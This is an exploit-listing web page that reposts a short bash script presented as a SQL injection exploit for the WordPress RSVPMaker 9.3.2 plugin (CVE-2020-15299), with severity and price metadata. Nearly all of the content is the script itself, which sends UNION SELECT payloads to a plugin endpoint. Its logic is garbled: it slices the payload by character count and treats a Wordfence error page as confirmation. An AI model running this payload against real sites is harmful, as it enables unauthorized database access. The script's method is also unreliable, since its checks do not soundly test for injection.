Advertisement






WordPress RSVPMaker 9.3.2 SQL Injection

CVE Category Price Severity
CVE-2020-15299 CWE-89 $1,000 High
Author Risk Exploitation Type Date
Exploit Alert High Remote 2024-01-17
CVSS
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2024010058

Below is a copy:

WordPress RSVPMaker 9.3.2 SQL Injection
#!/bin/bash

# Set the URL of the website running the vulnerable plugin
url="http://example.com/wp-content/plugins/rsvpmaker/rsvpmaker-email.php"

# Set the number of columns in the query
columns=5

response=$(curl -s "$url")
query=$(echo "$response" | grep -oP 'FROM .* WHERE .*')

payload="' UNION SELECT 1,2,3,4,5-- "

# Test the query with different numbers of columns
for i in $(seq 1 $columns)
do
  query_with_payload="${query%?*}?${payload:0:i}${query#*?}"
  curl -s -X POST -d "$query_with_payload" "$url" | grep -q "Wordfence Security Error"
  if [ $? -eq 0 ]
  then
    echo "Vulnerability confirmed with $i columns"
    break
  fi
done

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.